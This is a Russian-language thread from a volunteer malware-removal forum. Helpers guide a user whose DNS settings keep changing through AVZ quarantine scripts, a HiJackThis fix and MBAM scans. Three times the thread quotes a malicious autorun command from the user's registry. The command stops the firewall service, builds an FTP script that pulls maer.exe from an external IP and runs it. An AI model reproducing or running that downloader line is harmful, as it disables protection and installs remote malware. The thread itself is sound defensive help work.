Изменяются DNS

Добрый день!!! Подскажите пжл, DNS адреса меняются сами по себе, в этот момент отключается интернет, восставливается только после изменений DNS вручную, через некоторое время ошибка повтаряется. KAV находит вирусы и сразу удаляет, но проблема не решается. Спасибо!

Уважаемый(ая) [B]Олежка[/B], спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"] правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Логи. Спасибо!

[CODE]c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt[/CODE]В автозапуске сами прописывали?

Выполните скрипт в AVZ
[code]begin
QuarantineFile('C:\WINDOWS\System32\xsynjlib.exe','');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end. [/code]Компьютер перезагрузите вручную

Пришлите карантин согласно [B]Приложения 3[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

[QUOTE=thyrex;848038][CODE]c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt[/CODE]В автозапуске сами прописывали?

нет.

[size="1"][color="#666686"][B][I]Добавлено через 56 секунд[/I][/B][/color][/size]

Карантин отправил. Вы его получили?

Пофиксите в HiJack
[CODE]O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 98.126.218.12 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get maer.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&maer.exe&maer.exe&del cmd.txt[/CODE]

Выполните скрипт в AVZ
[code]begin
DeleteFile('C:\WINDOWS\System32\xsynjlib.exe');
DeleteService('XsynjSvc');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end. [/code]Компьютер перезагрузите вручную

Сделайте новые логи

Новые Логи

После перезагрузки DNS остались правильными, до этого всегда менялись.

Больше плохого не видно

Спасибо!!! Надеюсь будет работать.
Посмотрите пжл, может и здесь мне сможете помочь [url]http://virusinfo.info/showthread.php?t=113492[/url]. Я думаю, что проблема в том же. ПК Были в одной локальной сетке.

Сделайте лог [url="http://virusinfo.info/showpost.php?p=457118&postcount=1"]полного сканирования МВАМ[/url]

делаю....

удалять найденные обекты можно?

Выполните скрипт в AVZ
[code]begin
QuarantineFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\APY5K9CR\S01[1].exe', 'MBAM: Malware.Packer');
QuarantineFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\K9OXQDYH\S01[1].exe', 'MBAM: Malware.Packer');
QuarantineFile('c:\WINDOWS\system32\s.exe', 'MBAM: Malware.Packer');
QuarantineFile('c:\RECYCLER\hex2.exe', 'MBAM: Trojan.Agent');
DeleteFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\APY5K9CR\S01[1].exe');
DeleteFile('c:\documents and settings\default user\local settings\temporary internet files\Content.IE5\K9OXQDYH\S01[1].exe');
DeleteFile('c:\WINDOWS\system32\s.exe');
DeleteFile('c:\RECYCLER\hex2.exe');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end. [/code]Компьютер перезагрузите вручную

Пришлите карантин согласно [B]Приложения 3[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

Сделайте новый лог МВАМ

Карантин отправил

новый лог

c:\server.exe - знаком этот файл?

нет

[url="http://virusinfo.info/showpost.php?p=493584&postcount=2"]Удалите в МВАМ[/url] [b]всё найденное[/b]

Все обновления для сервера установлены?

Обновления да. В конце дня все вирусы восстановились, поставил на повторное сканирование. И запустил проверку всех пк в локалке. Припшлю вам новые логи. Спасибо огромное за помощь!!

[size="1"][color="#666686"][B][I]Добавлено через 2 минуты[/I][/B][/color][/size]

Добрый вечер. забыл))